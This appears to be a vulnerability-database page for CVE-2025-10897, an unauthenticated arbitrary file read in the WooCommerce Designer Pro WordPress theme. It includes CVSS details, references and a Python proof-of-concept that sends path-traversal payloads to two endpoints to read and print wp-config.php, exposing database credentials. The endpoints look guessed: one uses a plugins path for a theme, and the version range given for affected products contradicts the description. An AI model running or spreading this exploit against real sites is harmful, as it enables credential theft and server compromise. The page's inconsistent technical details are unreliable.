CVE-2025-10897

Description

The WooCommerce Designer Pro theme for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 1.9.28. This makes it possible for unauthenticated attackers to read arbitrary files on the server, which can expose DB credentials when the wp-config.php file is read.

CVSS Details

CVSS Score

8.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WooCommerce Designer Pro theme < 1.9.28

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-10897 PoC - Arbitrary File Read in WooCommerce Designer Pro theme
# Target: WordPress site with WooCommerce Designer Pro theme <= 1.9.28

target_url = "http://target-site.com/wp-content/plugins/woocommerce-designer-pro/includes/upload.php"

# Read wp-config.php
payload = {
    "file_path": "../../../../wp-config.php"
}

try:
    response = requests.post(target_url, data=payload, timeout=10)
    if response.status_code == 200:
        print("[+] Successfully read wp-config.php")
        print(response.text)
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Alternative endpoint (may vary based on version)
alt_url = "http://target-site.com/wp-content/themes/woocommerce-designer-pro/inc/download.php"
alt_payload = {
    "file": "../../../../wp-config.php"
}

try:
    response = requests.get(alt_url, params=alt_payload, timeout=10)
    if response.status_code == 200:
        print("[+] Successfully read file via alternative endpoint")
        print(response.text)
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10897
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10897
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10897/
[4] VulDB https://vuldb.com/cve/CVE-2025-10897
[5] https://codecanyon.net/item/woocommerce-designer-pro-cmyk-card-flyer/22027731
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/3a47cdeb-bd05-4e7e-99dc-dca67064182a?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10897", "sourceIdentifier": "[email protected]", "published": "2025-10-31T08:15:36.383", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WooCommerce Designer Pro theme for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 1.9.28. This makes it possible for unauthenticated attackers to read arbitrary files on the server, which can expose DB credentials when the wp-config.php file is read."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://codecanyon.net/item/woocommerce-designer-pro-cmyk-card-flyer/22027731", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3a47cdeb-bd05-4e7e-99dc-dca67064182a?source=cve", "source": "[email protected]"}]}}